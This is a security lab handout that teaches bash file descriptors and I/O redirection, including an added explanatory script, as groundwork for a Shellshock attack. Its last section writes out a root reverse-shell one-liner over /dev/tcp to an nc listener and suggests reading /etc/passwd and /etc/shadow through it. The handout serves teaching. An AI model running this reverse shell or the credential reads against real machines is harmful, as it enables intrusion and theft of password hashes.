Lab: Shellshock IO Redirection
Step 5. The goal of this step is to understand I/O redirection in bash.
- Bash is our target program for this attack.
- To exploit it, we would like to make bash provide a "reverse shell"
- To do this, we need to learn a bit more about bash.
- File descriptors
- C++ programs
  - cin deals with the standard input stream.
  - cout deals with the standard output stream.
  - cerr deals with the standard error stream.
  - Take a look at ioTest.cpp in the shellShock directory.
  - Run it.
- At the C level, these are accessed by a number, the file descriptor:
  - cin is 0
  - cout is 1
  - cerr is 2
- This carries over to bash as well.
- I/O redirection
  - In bash, you can change where a program's cin, cout and cerr go with the < and > operators.
  - in is a file in the shellShock directory. Try:
    ioTest < in
    This maps the file in to the standard input stream.
  - Now try:
    ioTest > out
    You will need to type something; you will not be prompted.
    This maps the file out to the standard output stream.
    The prompt was consumed as well: it is written to cout, so it went into out instead of the terminal.
  - Finally try:
    ioTest 2> err
    No space between 2 and >.
    Notice this sends stream 2 (cerr) to the file err.
- We can send multiple streams to the same place as well.
  - Order is important.
    ioTest > newOut 2>&1
    What did this do?
- Something strange
  - Start a nc server in one window:
    nc -l 9090 -v
  - In another window run:
    ioTest > /dev/tcp/localhost/9090 0<&1
    /dev/tcp/localhost/9090 is the location of the network connection.
    0<&1 makes stdin and stdout the same.
  - Now type in the server window (the nc window).
  - Notice the output of the program is sent to the server, and anything the server writes is sent back to the program.
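The following bash script is an added example, not the lab's ioTest.cpp or any other code from the lab. It answers the "what did this do?" question about `> newOut 2>&1` (and goes one step further by showing the reversed order `2>&1 > newOut`), and it shows why `0<&1` makes a program read from and write to the same place. A shell function io_test stands in for the ioTest program (an assumption: it reads one line, writes one line to stdout and one to stderr), and a regular file opened read/write with `1<>` stands in for the /dev/tcp socket, since a plain `>` file is write-only and cannot be read through fd 0.

```bash
#!/bin/bash
# Added example (not the lab's ioTest.cpp): a stand-in that reads one line from
# fd 0, writes one line to fd 1 and one line to fd 2, so each redirection's
# effect can be seen in what lands where.
io_test() {
  local line
  read -r line
  echo "out: got '$line'"
  echo "err: diagnostic" >&2
}

# `> file 2>&1`: redirections are applied left to right. fd 1 is pointed at
# the file first, then fd 2 is made a copy of fd 1, so both streams end up in
# the file. Prints the file's contents.
both_to_file() {
  local f
  f=$(mktemp)
  echo hello | io_test > "$f" 2>&1
  cat "$f"
  rm -f "$f"
}

# `2>&1 > file`: fd 2 copies fd 1 while fd 1 still points at the caller's
# stdout; only afterwards is fd 1 moved to the file. The stderr line therefore
# escapes to the caller and only the stdout line reaches the file.
err_escapes() {
  local f escaped
  f=$(mktemp)
  escaped=$(echo hello | io_test 2>&1 > "$f")
  printf 'escaped=%s\nfile=%s\n' "$escaped" "$(cat "$f")"
  rm -f "$f"
}

# `0<&1`: fd 0 becomes a copy of fd 1, so the program reads from and writes
# to the same open file. With /dev/tcp that is a socket; here a regular file
# opened read/write with `1<>` stands in for it. The read consumes "hello" and
# advances the shared offset, so the program's output lands after it.
# (A file opened with plain `>` is write-only; copying it onto fd 0 would make
# the read fail.) Prints the file's final contents.
shared_fd() {
  local f
  f=$(mktemp)
  printf 'hello\n' > "$f"
  io_test 1<> "$f" 0<&1 2>/dev/null
  cat "$f"
  rm -f "$f"
}

echo '--- > file 2>&1 ---';   both_to_file
echo '--- 2>&1 > file ---';   err_escapes
echo '--- 1<> file 0<&1 ---'; shared_fd
```

The key rule the script demonstrates is that `N>&M` copies whatever fd M points at *at that moment*, which is why `> newOut 2>&1` captures both streams while `2>&1 > newOut` captures only stdout, and why `0<&1` only gives a two-way channel when fd 1 is something readable and writable, such as the /dev/tcp socket.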
- We could use this to ping a web server.
  - Take a look at webClient.cpp.
    webClient > /dev/tcp/10.0.2.15/80 0<&1
    or
    webClient > /dev/tcp/localhost/http 0<&1
- A remote shell
  - Start a nc server in one window:
    nc -l 9090 -v
  - In another terminal run sudo to become root.
    - This is not required, but I want the shell as a different user.
  - In the root window run:
    /bin/bash -i > /dev/tcp/localhost/9090 2>&1 0<&1
  - Notice in the server window you now have a root shell.
    - Don't use more or less.
    - But cat /etc/passwd
    - cat /etc/shadow
  - If we could trick a network-enabled program (like httpd) into running this shell, we would have access to the machine.